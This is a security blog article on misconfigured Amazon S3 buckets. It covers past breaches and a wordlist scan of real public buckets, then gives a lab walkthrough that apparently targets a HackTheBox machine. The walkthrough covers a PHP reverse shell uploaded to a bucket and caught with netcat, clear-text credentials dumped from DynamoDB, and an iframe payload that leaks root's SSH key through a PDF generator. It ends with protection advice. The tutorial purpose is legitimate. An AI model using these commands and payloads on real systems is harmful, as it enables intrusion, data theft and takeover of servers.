

How to protect your resource from being hacked through the Amazon S3 service

Published: October 14, 2021 By Sabrina Lupsan


The AWS S3 cloud service now stores over 100 trillion objects, and Amazon claims 99.999999999% (eleven nines) durability for the objects stored there. Huge companies like Netflix, Twitch, and the BBC use Amazon S3 to store their data in the cloud.

According to one estimate, about 5.5% of AWS S3 buckets are public: anybody can read them due to misconfigurations. That would put roughly 5.5 trillion objects stored in the Amazon S3 cloud service at risk of exposure. And in this article, I will show you how easily we can find them.

In this article, we will:

  • analyze vulnerabilities in S3 buckets
  • show in detail how a machine running AWS services can be hacked
  • list protection measures, recommended by Amazon and by us, to keep your data safe in the cloud.

Disclaimer: The attack replicated in this article was performed on a machine in a safe environment, set up especially for this purpose. Please do not attack anyone without written consent.

Most impactful Amazon S3 data breaches

Alteryx Inc exposed the data of 123 million American households

The year 2017 was an infamous one for the Amazon S3 cloud service. The computer software company Alteryx exposed private information, such as addresses, ages, phone numbers, mortgage details, and ethnicity, belonging to no fewer than 123 million American households: approximately 97.06% of the total number of households.

This data breach happened because of a misconfiguration in the bucket where the information was stored. The storage was public and therefore accessible for anyone.

40,000 plain-text passwords stored by Accenture were leaked

Accenture, a company specializing in IT services and consulting, left the contents of four servers exposed in public Amazon S3 buckets. They contained around 40,000 plain-text passwords and other critical information, such as credentials and access keys needed to log into its internal API.

Among the credentials were administrators' login details.

It is unknown whether Accenture personnel were impersonated using the stolen credentials, or whether even more business information was stolen.

Another thing to consider: if Accenture employees reuse passwords across websites and platforms, the fallout from the breach can extend far beyond the organization itself.

Verizon compromised 6 million records on public S3 servers

The giant Verizon, an American wireless network operator, stored records containing names, account PINs, addresses, mobile numbers, and more on a public Amazon S3 server: 6 million records in total. Some were exposed partially, while others were leaked in full.

The public S3 server was managed by Verizon's partner Nice Systems, a company specializing in telephone voice recording, data security, and related services.

All of these data breaches happened because of unconfigured or misconfigured Amazon S3 buckets and servers. It is critical to understand how the Amazon cloud service works and what to do to prevent such substantial security disasters.

Other significant entities that fell victim to such data breaches are the U.S. Department of Defense, Time Warner Cable, and World Wrestling Entertainment (WWE).


How to find vulnerable S3 buckets

Amazon says there are 100 trillion objects stored in the S3 cloud service. It is estimated that about 5.5% of them are public and accessible to anyone.

Amazon S3 buckets can be either public or private. New buckets are private by default, but a single misconfigured permission or policy can expose one to the world: if you do not take security measures to limit access to your data, a bucket can end up public.

A public S3 bucket is accessible to everyone; anyone can find one and download its contents. I don't know about you, but this sounds very scary to me – could anyone on the internet download my files?
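Whether a bucket is public shows up directly in the HTTP status code of an unauthenticated GET against its URL. The helper below is a minimal sketch of that check; the bucket name is illustrative, `check_bucket` performs a real network request, and `classify` is the pure decision logic.

```shell
# Map the HTTP status of an unauthenticated GET to a bucket state.
classify() {
  case "$1" in
    200) echo "public" ;;   # listing returned: world-readable
    403) echo "private" ;;  # bucket exists, but access is denied
    404) echo "missing" ;;  # no such bucket
    *)   echo "unknown" ;;
  esac
}

# Probe a bucket by name (hypothetical helper; sends a real HTTP request).
check_bucket() {
  classify "$(curl -s -o /dev/null -w '%{http_code}' "https://$1.s3.amazonaws.com/")"
}

classify 200   # prints: public
```

This is exactly the distinction the scanner below automates at scale: a 200 response means anyone can list and fetch the bucket's objects.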

Let's see how many of these buckets we can find in just a few minutes.

  1. Find an S3 bucket scraper.

I found a handy tool on GitHub named Bucket Finder. After looking at the Ruby code and reading the README.md, I concluded that it's safe to use and proceeded to download it.

git clone https://github.com/FishermansEnemy/bucket_finder.git

I then changed to the bucket_finder directory and made the Ruby script executable.

cd bucket_finder
chmod +x bucket_finder.rb
  2. Find a wordlist for the Bucket Finder tool

For the tool to work, we need to provide it with a wordlist. The Bucket Finder project does not include an appropriate one, but the aws-s3-bucket-wordlist repository on GitHub does. I cloned that repository as well and passed the list to Bucket Finder.

git clone https://github.com/koaj/aws-s3-bucket-wordlist.git 
./bucket_finder.rb aws-s3-bucket-wordlist/list.txt > output.txt

The sequence '> output.txt' redirects the output to a text file, which is easier for us to work with.

We can take a peek into this wordlist, so we know what we're using.

head -20 aws-s3-bucket-wordlist/list.txt

The first 20 words in the list.txt wordlist

  3. Inspect and clean the results

Taking a peek into the 'output.txt' file, we see that some of the buckets are not public and therefore clog our results.

Some buckets deny our access

However, we can clean our results. Using the 'grep' tool, we will select only the lines that contain the string '<Public>'. And we have a lot of results in just the first 100 lines of the file.

head -100 output.txt | grep '<Public>'

Public objects on the S3 buckets

After letting the script run for around 10 minutes, we have discovered a staggering number of public S3 buckets.

cat output.txt | grep '<Public>' > public_objects.txt

Now we have all of our findings in the file public_objects.txt. We grep the results again because some entries span more than one line (and we don't want to count a URL twice), and then count the occurrences with 'wc -l'.

cat public_objects.txt | grep '<Public>' | wc -l

The result?

4671 public objects were found in a few minutes

4671 URLs. If we try to click on one, we are prompted to download the file or files.

However, we will not be downloading anyone's files in this situation.

Finding 4671 URLs in just a few minutes is proof that misconfiguring your S3 bucket is extremely dangerous.
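To see how the counting pipeline behaves, here it is run against a small fabricated sample (the output format below is illustrative, not Bucket Finder's exact format), together with a deduplication step that guards against counting the same object twice:

```shell
# Fabricated sample of scanner output, for demonstration purposes only.
cat > sample_output.txt <<'EOF'
Bucket found: http://demo-one.s3.amazonaws.com/
  <Public> http://demo-one.s3.amazonaws.com/report.pdf
  <Public> http://demo-one.s3.amazonaws.com/backup.sql
Bucket access denied: http://demo-two.s3.amazonaws.com/
  <Public> http://demo-three.s3.amazonaws.com/logo.png
EOF

# grep -c counts matching lines in one step (equivalent to grep | wc -l).
grep -c '<Public>' sample_output.txt          # prints: 3

# Deduplicate the URLs before counting, so no object is counted twice.
grep '<Public>' sample_output.txt | awk '{print $2}' | sort -u | wc -l
```

The `sort -u` variant is the safer count: it collapses repeated URLs before `wc -l` tallies them.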

Next, I will replicate an attack (in a safe environment, NOT on one of the found URLs) to show you just how damaging a vulnerable bucket can be to its owner. It goes beyond stealing a few files and ends in owning the server machine itself.


Amazon S3 Bucket Vulnerability

I will show you how I have replicated an attack by using the file upload feature of Amazon S3.

I first installed the AWS CLI (Command Line Interface) on my Kali Linux machine with the command:

sudo apt install awscli

We install the AWS CLI using the command sudo apt install awscli

I then attempted to connect to a custom endpoint and list the files in the server:

aws --endpoint-url http://s3.bucket.htb s3 ls

We connect to an endpoint, but we first have to configure credentials

However, credentials need to be configured to connect. They can be set with the following command:

aws configure

When prompted, leaving every field blank does not work. But entering invalid keys (any data at all) does, because the endpoint never validates them.

We issue the previous command, and it works; we are connected to the endpoint.

We can now connect to the endpoint
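If you'd rather skip the interactive prompts, the same throwaway credentials can be supplied through a credentials file. A sketch, assuming a local S3 endpoint that does not validate keys (the file path and values here are arbitrary):

```shell
# Point the AWS CLI at a throwaway credentials file (avoids touching ~/.aws).
export AWS_SHARED_CREDENTIALS_FILE="$PWD/fake_credentials"
export AWS_DEFAULT_REGION="us-east-1"

# Any values work: the local endpoint never checks them against AWS.
cat > "$AWS_SHARED_CREDENTIALS_FILE" <<'EOF'
[default]
aws_access_key_id = fakekeyid
aws_secret_access_key = fakesecretkey
EOF

# Equivalent non-interactive alternative using the CLI itself:
#   aws configure set aws_access_key_id fakekeyid
#   aws configure set aws_secret_access_key fakesecretkey
```

This keeps the dummy keys out of your real AWS profile, which matters if you also use the CLI with legitimate credentials.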

Now we will use the file upload feature of Amazon AWS by uploading a reverse shell that connects back to us.

A reverse shell is a command or a collection of commands that establish a connection from a remote machine to our machine. We are making the target machine connect to us by injecting a file that executes these commands.

Using Kali Linux, such reverse shells are already on your machine, in the directory /usr/share/laudanum/php. If you are on a different Linux flavor, you can download the reverse shell from PentestMonkey.

However, before using this file, you must change the IP and port inside it to your own. You can find your IP with ifconfig; I used port 443. Comments next to the parameters mark what you have to change (or use CTRL+F to find them quickly).

We change the reverse shell with our IP and port

We then upload the file on the server by using the cp (copy) command.

aws --endpoint-url http://s3.bucket.htb s3 cp reverse_shell.php s3://adserver/rev.php

We upload the reverse shell under the name rev.php

You should get a prompt back with the upload location.

Next, we set up a Netcat listener. The machine will connect back to us on port 443, so we use Netcat to receive the connection.

sudo nc -nlvp 443 

We turn on a netcat listener on port 443

We now browse the website to execute our shell. We type the website's URL, a '/', and the file name to reach our injected file. We uploaded it under the name rev.php.

We visit the website at /rev.php to execute our injected commands

After we browse it, we check in the terminal and see that we have a shell.

Gained low privileged shell as www-data

We can now type commands on the machine hosting the server.

We are a low-privilege user, www-data. However, this does not mean the vulnerability has little impact: there are many ways to escalate our privileges.

Before continuing with this shell, I will show you some other commands you can run against the AWS endpoint that expose a significant vulnerability.

The server also runs DynamoDB, Amazon's NoSQL database service. We can use this to learn more about the stored data. The following command lists the names of the tables in the database.

aws --endpoint-url=http://s3.bucket.htb dynamodb list-tables

We find the name of the table 'users'

We see that the database contains the table "users". Enumerating further, we find the users and the clear-text passwords.

aws --endpoint-url=http://s3.bucket.htb dynamodb scan --table-name users

We read the credentials from the table 'users'
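For reference, `aws dynamodb scan` returns JSON in which every attribute value is wrapped in a type marker ("S" for string). The snippet below fakes a trimmed scan result with made-up users and pulls the strings out with grep and sed:

```shell
# Fabricated scan output; real data would come from `aws dynamodb scan`.
cat > scan_output.json <<'EOF'
{
  "Items": [
    { "username": { "S": "alice" }, "password": { "S": "Summer2021!" } },
    { "username": { "S": "bob" },   "password": { "S": "hunter2" } }
  ],
  "Count": 2,
  "ScannedCount": 2
}
EOF

# Extract just the attribute strings for a quick credential list.
grep -o '"S": "[^"]*"' scan_output.json | sed 's/^"S": "//; s/"$//'
```

The extraction prints the four attribute strings one per line (alice, Summer2021!, bob, hunter2), which is enough to feed a password-spraying attempt like the SSH step below.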

Going back to our initial shell, we need to find the users of the machine. They are not necessarily the same as the ones in the database (but password reuse happens, so the found credentials may still be valid).

ls -la /home

We list the directories from home to find all the users

We see the user roy. To get a more stable shell and show how to use SSH on the machine, we connect over SSH, trying each of the passwords from the database. The last one works, and we are connected as roy!

We SSH as roy and test the obtained credentials

Now, to gain complete control of the system, we use the AWS server one more time.

We create the table alerts:

aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
        AttributeName=data,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
        AttributeName=data,KeyType=RANGE \
    --provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
    --endpoint-url http://s3.bucket.htb

And add a record:

aws dynamodb put-item \
    --table-name alerts \
    --item '{
        "title": {"S": "Ransomware"},
        "data": {"S": "<html><head></head><body><iframe src=\"/root/.ssh/id_rsa\"></iframe></body></html>"}
    }' \
    --return-consumed-capacity TOTAL \
    --endpoint-url http://s3.bucket.htb

An internal web application listening on port 8000 renders the records of the alerts table into a PDF. Because our record embeds an iframe pointing at /root/.ssh/id_rsa, the generated PDF will contain the root user's private SSH key.

We trigger the conversion:

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000

And then we use curl again to download the generated PDF:

curl http://127.0.0.1:8000/files/result.pdf -o ./result.pdf

We open result.pdf and find the RSA private key.

We move the key into a file called id_rsa and set appropriate permissions so we can connect with SSH.

chmod 400 id_rsa
ssh root@bucket.htb -i id_rsa

We change the permissions on the root's key and successfully SSH into it, gaining full access to the machine

And with that, we have gained full access to the machine through Amazon S3 bucket vulnerabilities.


What is Amazon S3?

Amazon Simple Storage Service, or Amazon S3, is a service offered by Amazon Web Services (AWS) that provides object storage in the cloud. Amazon promises:

  • scalability
  • data availability
  • security
  • performance

A bucket is a resource available on an AWS S3 server. It is a container, like a folder, that stores objects (files together with their metadata).

According to a trusted source, AWS's top users include huge companies like Netflix, Twitch, LinkedIn, Facebook, BBC, Adobe, Twitter, etc.

Top 10 AWS Users


Protection measures

To protect your AWS S3 bucket and disallow intruders' access to your storage space, you can use the following features provided by Amazon:

  • Block public access
  • Use bucket ACLs (Access Control Lists) to revoke read and write permissions from "Everyone"
  • Audit your Amazon S3 buckets with the ListBuckets API
  • Implement policies that do not allow everyone to access and perform actions on the bucket (note: the wildcard "*" means everyone)
  • Encrypt your data. Amazon supports HTTPS, which encrypts data in transit, and server-side encryption (SSE-S3 or SSE-KMS) for data at rest
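As a concrete example of the policy and encryption points, the sketch below writes a bucket policy that denies any request made over plain HTTP, and shows the CLI calls that would apply it. The bucket name is a placeholder, and the `aws` commands are commented out because they require valid credentials for the bucket owner.

```shell
# Bucket policy: deny every request that is not made over HTTPS.
cat > policy.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "DenyInsecureTransport",
    "Effect": "Deny",
    "Principal": "*",
    "Action": "s3:*",
    "Resource": [
      "arn:aws:s3:::my-example-bucket",
      "arn:aws:s3:::my-example-bucket/*"
    ],
    "Condition": { "Bool": { "aws:SecureTransport": "false" } }
  }]
}
EOF

# Apply the policy (run as the bucket owner):
# aws s3api put-bucket-policy --bucket my-example-bucket --policy file://policy.json

# Block all public access at the bucket level:
# aws s3api put-public-access-block --bucket my-example-bucket \
#   --public-access-block-configuration \
#   BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
```

Note that the Deny statement uses the "*" principal deliberately: here the wildcard works for you, refusing insecure transport to everyone rather than granting access.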

Infographic

I have prepared an infographic where you can see statistics about the Amazon S3 cloud storage platform. Please read the protection measures carefully and apply them to keep your data safe!

Infographic about Amazon AWS S3 cloud storage



Conclusion

You have seen how many major data breaches affected huge companies and revealed millions of personal records. We effortlessly found public S3 objects in 10 minutes, just by using a free tool on GitHub.

Considering the demonstration in this article, you should take great care of your cloud storage and apply all the security measures that Amazon and I recommend.

It matters because, as I demonstrated today, the machine hosting the AWS server can be compromised, and the damage can extend to your or your company's entire storage.

If you use the Amazon S3 service, please let me know if you have heard of any other vulnerabilities, and what protection measures you take to keep your private data safe.

Author
Sabrina Lupsan
Sabrina Lupșan is a writer at CoolTechZone, a cybersecurity enthusiast, and a future penetration tester. She holds a Bachelor’s degree in Computer Science and Economics.
